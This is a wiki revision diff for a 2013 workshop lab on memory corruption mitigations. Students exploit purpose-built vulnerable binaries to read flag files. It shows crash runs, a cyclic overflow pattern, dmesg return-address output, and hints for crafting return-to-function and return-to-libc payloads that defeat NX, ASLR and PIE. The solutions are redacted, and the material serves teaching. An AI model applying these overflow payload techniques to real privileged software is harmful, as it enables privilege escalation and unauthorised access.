Pagini
Workshops
Organizatori
Parteneri
Differences
This shows you the differences between two versions of the page.
| Next revision | Previous revision | ||
|
sesiuni:memory:4 [2013/07/11 00:50] rcaragea created |
sesiuni:memory:4 [2013/07/12 15:21] (current) rcaragea [Hijacking control flow] |
||
|---|---|---|---|
| Line 1: | Line 1: | ||
| = Session 4: Intro to memory corruption mitigation. = | = Session 4: Intro to memory corruption mitigation. = | ||
| + | |||
| + | {{:sesiuni:memory:session-04.pdf|Slides}} | ||
| <html> | <html> | ||
| Line 6: | Line 8: | ||
| </center> | </center> | ||
| </html> | </html> | ||
| + | |||
| + | = Tasks = | ||
| + | |||
| + | == Summary == | ||
| + | Tasks along with descriptions and hints are available only on the lab machines. | ||
| + | The lab format is split into two parts and is challenge-oriented: | ||
| + | * Each task ca be accessed only by its owner user (e.g. task randmin_01 and its source can only be read by user randmin_01) | ||
| + | * The tasks have elevated permission on execution (e.g. task randmin_01 has permissions to read files of randmin_01 and randmin_02) | ||
| + | * The password for the next level is in flags/next_task_level | ||
| + | * Your goal is to 'trick' the application into reading the content of that file | ||
| + | * After you obtain the password you can advance to the next level by switching to that user | ||
| + | * You are initially given the password to log into randmin_01: "1234" and gatekeeper_01: "4321" | ||
| + | |||
| + | == Categories == | ||
| + | |||
| + | Category 1 (address space recap) requires you to enter a password in order to print the flag for the next level, but there's a catch: you don't enter a password, you need to enter a memory address | ||
| + | * **gatekeeper_01** | ||
| + | * **gatekeeper_02** | ||
| + | * **gatekeeper_03** (Bonus) | ||
| + | |||
| + | Category 2 (memory corruption) | ||
| + | * **randmin_01**, **randmin_02**: You need to defeat NX by returning to .text | ||
| + | * **randmin_03**, **randmin_04**: You need to defeat NX by returning to libc | ||
| + | * **randmin_05**: You need to defeat NX + ASLR | ||
| + | * **randmin_06**: You need to defeat NX + ASLR + PIE | ||
| + | * **randmin_07** (Bonus) : You need to defeat NX + ASLR + PIE + SSP | ||
| + | |||
| + | |||
| + | == Example run == | ||
| + | |||
| + | <code bash> | ||
| + | dmns@dmns-VirtualBox:/$ su gatekeeper_01 | ||
| + | Password: | ||
| + | gatekeeper_01@dmns-VirtualBox:/$ cd | ||
| + | gatekeeper_01@dmns-VirtualBox:~$ ls | ||
| + | flags gatekeeper_01 gatekeeper_01.c | ||
| + | gatekeeper_01@dmns-VirtualBox:~$ cat flags/gatekeeper_01_flag | ||
| + | cat: flags/gatekeeper_01_flag: Permission denied | ||
| + | gatekeeper_01@dmns-VirtualBox:~$ cat gatekeeper_01.c | head | ||
| + | /* | ||
| + | * Workshop "Memory Management in C", July 2013 | ||
| + | * Memory corruption tasks | ||
| + | * Radu Caragea | ||
| + | */ | ||
| + | |||
| + | #include <stdio.h> | ||
| + | #include <string.h> | ||
| + | #include <stdlib.h> | ||
| + | |||
| + | gatekeeper_01@dmns-VirtualBox:~$ ./gatekeeper_01 | ||
| + | Welcome to <<Gate 1>> human, what is your name? | ||
| + | testing | ||
| + | What is the passphrase testing? Give me a memory address of where it is and you shall be granted access | ||
| + | Enter the address in hex like so: 0x123ABC | ||
| + | 0x123ABC | ||
| + | Checking contents of 0x123abc | ||
| + | Segmentation fault | ||
| + | gatekeeper_01@dmns-VirtualBox:~$ ./gatekeeper_01 | ||
| + | Welcome to <<Gate 1>> human, what is your name? | ||
| + | testing2 | ||
| + | What is the passphrase testing2? Give me a memory address of where it is and you shall be granted access | ||
| + | Enter the address in hex like so: 0x123ABC | ||
| + | [solution commented out] | ||
| + | Checking contents of [solution commented out] | ||
| + | Access granted! The password to gatekeeper_02 is: | ||
| + | [flag commented out] | ||
| + | gatekeeper_01@dmns-VirtualBox:~$ su gatekeeper_02 | ||
| + | Password: | ||
| + | gatekeeper_02@dmns-VirtualBox:/home/gatekeeper_01$ cd | ||
| + | gatekeeper_02@dmns-VirtualBox:~$ ls | ||
| + | flags gatekeeper_02 gatekeeper_02.c | ||
| + | gatekeeper_02@dmns-VirtualBox:~$ cat flags/gatekeeper_02_flag | ||
| + | cat: flags/gatekeeper_02_flag: Permission denied | ||
| + | gatekeeper_02@dmns-VirtualBox:~$ | ||
| + | |||
| + | </code> | ||
| + | |||
| + | **NOTE**: The segmentation fault is expected as that address is not mapped into the process address space. | ||
| + | |||
| + | |||
| + | == Gdb tricks you might need == | ||
| + | Check the [[sesiuni:memory:gdb|]] especially in the 'information' and 'various useful stuff' sections | ||
| + | |||
| + | |||
| + | == Hijacking control flow == | ||
| + | * The exact location of a segfault is written in the kernel log. You can view it with dmesg (you'll only need the last line) | ||
| + | |||
| + | <code bash> | ||
| + | randmin_01@102lin:~$ ./randmin_01 | ||
| + | Enter the password: | ||
| + | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | ||
| + | You entered: | ||
| + | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | ||
| + | You are not the Randministrator! | ||
| + | This unauthorized attempt will be logged. | ||
| + | Segmentation fault | ||
| + | randmin_01@102lin:~$ dmesg|tail -1 | ||
| + | [ 5277.100200] randmin_01[5839]: segfault at 41414141 ip 0000000041414141 sp 00000000ffffd370 error 14 | ||
| + | randmin_01@102lin:~$ | ||
| + | </code> | ||
| + | |||
| + | * You can use a pattern so that you can easily see what was written into the return address instead of trial and error. | ||
| + | <code bash> | ||
| + | randmin_01@102lin:~$ ./randmin_01 | ||
| + | Enter the password: | ||
| + | Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5 | ||
| + | You entered: | ||
| + | Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5 | ||
| + | You are not the Randministrator! | ||
| + | This unauthorized attempt will be logged. | ||
| + | Segmentation fault | ||
| + | randmin_01@102lin:~$ dmesg|tail -1 | ||
| + | [ 5481.155852] randmin_01[5853]: segfault at 64413764 ip 0000000064413764 sp 00000000ffffd370 error 14 | ||
| + | </code> | ||
| + | |||
| + | |||
| + | * When you want to jump to a function that takes no arguments you only need to append its address to the exploit pattern | ||
| + | <code c> | ||
| + | ... | ||
| + | int f() | ||
| + | { | ||
| + | printf("Hello\n"); | ||
| + | return 42; | ||
| + | } | ||
| + | ... | ||
| + | </code> | ||
| + | * If the address of the function is 0x0804849c your exploit pattern will look like "AAAAAA...AAA\x9c\x84\x04\x08" because calling this function will look like | ||
| + | <code asm> | ||
| + | ... | ||
| + | call 804849c <f> | ||
| + | ... | ||
| + | </code> | ||
| + | * For tasks randmin_03 and up you will need to call system(char *cmd) | ||
| + | <code c> | ||
| + | ... | ||
| + | int f(char *str) | ||
| + | { | ||
| + | printf("%s\n", str); | ||
| + | return 42; | ||
| + | } | ||
| + | ... | ||
| + | </code> | ||
| + | * Translated to asm: | ||
| + | <code asm> | ||
| + | ... | ||
| + | movl $0x80485a0,(%esp) (0x80485a0 is the address of the string parameter) | ||
| + | call 804849c <f> | ||
| + | ... | ||
| + | </code> | ||
| + | * Because 'call' also pushes 4 bytes on the stack the parameter is offset by exactly 4 bytes, so if you want to call f with the address of that string your exploit should look like "AAAAAA...AAA\x9c\x84\x04\x08ABCD\xa0\x85\x04\x08" where ABCD is the 4 byte value mentioned (any value will work) | ||
| + | |||
| + | == Tools you will need == | ||
| + | * gdb | ||
| + | * nm | ||
| + | * ldd | ||
| + | * objdump | ||
| + | * ulimit | ||
| + | * checksec.sh [[http://www.trapkit.de/tools/checksec.sh]] | ||
| + | * <del> aslr_brute_helper.py [[http://swarm.cs.pub.ro/~rcaragea/aslr_brute_helper.py]] </del> | ||